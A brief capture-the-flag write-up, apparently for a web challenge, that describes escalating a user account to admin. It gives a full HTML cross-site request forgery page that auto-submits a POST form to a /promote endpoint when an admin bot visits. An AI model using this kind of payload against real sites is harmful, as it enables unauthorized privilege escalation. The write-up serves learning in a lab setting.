We get presented with a login / register screen. Once
registered and logged in, we discover that we've
been given a login token cookie e4955d3a-2920-485c-ab85-232a96351872.
If we paste that in to the form, we get "Not Admin..."
Following the Report Issues link we are given the opportunity to get the admin bot to visit an arbitrary url.
If we just give the promote url, it won't work because it's a POST request, and we won't submit the body argument with it. So instead, we setup a website with the following html:
<!DOCTYPE html>
<html>
<body onload="setTimeout(function() {document.doom.submit()})">
<form action="http://customer.w-va.cf/promote" name="doom" method="POST">
<input name="user_token" value="e4955d3a-2920-485c-ab85-232a96351872">
</form>
</body>
</html>This will automatically submit the form with the desired value. Technically,
since the request has no custom headers, we could also have done this as a
fetch request as well.
So we submit the url of the above website to the bot, and we get promoted. Refreshing the page resuls in us seeing the flag.